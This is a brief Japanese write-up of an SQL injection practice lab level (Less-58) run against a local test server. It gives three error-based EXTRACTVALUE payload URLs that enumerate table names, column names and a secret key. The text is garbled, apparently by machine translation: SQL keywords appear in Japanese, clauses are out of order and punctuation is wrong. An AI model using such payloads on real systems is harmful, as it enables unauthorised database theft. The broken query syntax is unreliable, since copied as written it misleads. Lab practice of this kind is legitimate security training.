私たちはここに労働組合の共同注入、ここで使用されるエラー注入を使用することはできませんので、SQL文を実行し、後に、データベースからデータを返しませんでした。しかししようとする唯一の5つの機会があることに注意してください。
テーブル名を探します
http://127.0.0.1/sql/Less-58/?id=-1' 及びEXTRACTVALUE(1、CONCAT(TABLE_SCHEMA = INFORMATION_SCHEMA.TABLESから0x7Eを、(選択GROUP_CONCAT(TABLE_NAME) '課題')、0x7Eを)) - +
列名を探します
http://127.0.0.1/sql/Less-58/?id=-1' およびinformation_schema.columnsからEXTRACTVALUE(1、CONCAT(0x7Eを、(選択GROUP_CONCAT(COLUMN_NAME)TABLE_SCHEMA = '課題' とTABLE_NAME = 'dzgnt6f0xz 「)、0x7eの)) - +
キーを探します
http://127.0.0.1/sql/Less-58/?id=-1' 及びEXTRACTVALUE(1、CONCAT(0x7Eを、(dzgnt6f0xzからGROUP_CONCAT(secret_GYDQ)を選択)、0x7Eを)) - +